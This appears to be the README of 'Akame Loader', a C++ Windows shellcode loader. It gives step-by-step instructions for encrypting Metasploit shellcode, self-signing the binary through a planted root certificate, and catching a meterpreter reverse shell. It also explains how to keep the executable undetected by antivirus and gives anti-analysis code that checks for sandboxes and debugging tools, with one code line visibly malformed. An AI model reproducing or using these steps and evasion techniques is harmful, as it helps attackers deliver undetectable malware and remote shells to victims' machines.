Icon: https://icon-icons.com/icon/Halloween-eye/109170 | Name | Details |
---|---|---|
Name | Akame Loader | |
Author | N3agu | |
Language | C++ | |
Platform | Windows | |
Version | 1.1 | |
License | MIT | |
Libraries | kernel32, advapi32, crypt32 | |
Encryption | AES256 | |
Build | Release |
! If you change the encryption method and want to keep your executable UD for a longer period of time, don't use VirusTotal / AntiScan.me / any other site that distributes to security vendors.
1. Generate shellcode
2. Encrypt your shellcode with encrypt.exe
mv shellcode.bin \Akame Loader\x64\Release\Resources\
cd \Akame Loader\x64\Release\Resources\
encrypt --help (optional, to view the manual)
encrypt.exe -l cpp -m file -i shellcode.bin -e random -o cli
3. Copy the output and paste it under the "payload" comment
4. Change the resources
5. Build the project
6. Add a certificate to your executable
! Change "Akame.exe" to your executable and AkameCert/AkameCA to whatever you want
move Akame.exe Resources && cd Resources
makecert.exe -r -pe -n "CN=Akame CA" -ss CA -sr CurrentUser -a sha256 -cy authority -sky signature -sv AkameCA.pvk AkameCA.cer
certutil -user -addstore Root AkameCA.cer
makecert.exe -pe -n "CN=Akame Cert" -a sha256 -cy end -sky signature -ic AkameCA.cer -iv AkameCA.pvk -sv AkameCert.pvk AkameCert.cer
pvk2pfx.exe -pvk AkameCert.pvk -spc AkameCert.cer -pfx AkameCert.pfx
signtool.exe sign /v /f AkameCert.pfx /t http://timestamp.digicert.com/?alg=sha1 Akame.exe
7. Listen for incomming connections
msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
(optional)set LHOST *IP*
set LPORT *PORT*
exploit
Platform: Windows 10 x64
Antivirus: Windows Defender 24/10/2022
! 720p because I can't upload video files bigger than 10MB on github
! Blackscreens in the video caused by UAC
I uploaded the loader to Virus Total because I don't want this to be used for malicious purposes!
The shellcode used was generated with metasploit (payload: windows/x64/meterpreter/reverse_tcp) and encrypted by \resources\encrypt.exe.
The loader was build with VS22 and signed with a sha1 certificate
Link: https://www.virustotal.com/gui/file/68e6a25457093584a043ed3f721be9bc9b6456edd792cb4e30054e85bdc4119f ! Attention, the reason the loader gets a lot of detections now is because Virus Total distributes samples, this is completely normal. With simple code obfuscation / small changes you can obtain a new, FUD payload, don't be script kiddies / pasters, learn how to code, stay safe!
C++ Clang Compiler for Windows
&& MSBuild support for LLVM (clang-cl) toolset
)C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\Llvm\x64\bin
and copy the files that you downloaded from Github and overwrite! The provided code is a set of parameters used with LLVM's obfuscation passes, here's a list of each parameter and what it does, parameters taken directly from ollvm-17 repository.
After that you only need to compile your solution and you will get a fairly large executable but with various flattening, encryption, substitution applied. Here's what you should get on analyzing the control flow graph with IDA:
Create Mutex to avoid running multiple instances of akame on the same machine. POC:
// Check the mutex at the beginning
if (OpenMutex(MUTEX_ALL_ACCESS, 0, L"MUTEX_RANDOM_STRING"))
return 0;
// Create mutex
CreateMutex(0, 0, L"MUTEX_RANDOM_STRING");
More anti analysis techniques (functions that check for suspicious files, directories, processes, windows' names, etc.). POC:
// A simple hard-disk check is already done, but we can as well check the available RAM / CPU
// If the machine has less than 2048mb (2gb) of ram -> exit
MEMORYSTATUSEX memoryStatus;
memoryStatus.dwLength = sizeof(memoryStatus);
GlobalMemoryStatusEx(&memoryStatus);
DWORD RAMMB = memoryStatus.ullTotalPhys / 1024 / 1024;
if (RAMMB < 2048) return 0;
// If the machine has less than 2 logical processors -> exit
SYSTEM_INFO systemInfo;
GetSystemInfo(&systemInfo);
DWORD numberOfProcessors = systemInfo.dwNumberOfProcessors;
if (numberOfProcessors < 2) return false;
// Check for specific running processes that are usually used in malware analysis, like WireShark, PE-Bear, ProcMon, IDA, X64/X32 DBG, etc.
PROCESSENTRY32W processEntry = { 0 };
processEntry.dwSize = sizeof(PROCESSENTRY32W);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
WCHAR processName[MAX_PATH + 1];
if (Process32FirstW(hSnapshot, &processEntry))
{
do
{
StringCchCopyW(processName, MAX_PATH, processEntry.szExeFile);
CharUpperW(processName);
if (wcsstr(processName, L"WIRESHARK.EXE") || wcsstr(processName), L"PE-BEAR.EXE" || wcsstr(processName), L".EXE" || ...)
return 0;
} while (Process32NextW(hSnapshot, &processEntry));
}
File
Hashes
Table of Imports
MIT License
Copyright (c) 2024 N3agu
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.